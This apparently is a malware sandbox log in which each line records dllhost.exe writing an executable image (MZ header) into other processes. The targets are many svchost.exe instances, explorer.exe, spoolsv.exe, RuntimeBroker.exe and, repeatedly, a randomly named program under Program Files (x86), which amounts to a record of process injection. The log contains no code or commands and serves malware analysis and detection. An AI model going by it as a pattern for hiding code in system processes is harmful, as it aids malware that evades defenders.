Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
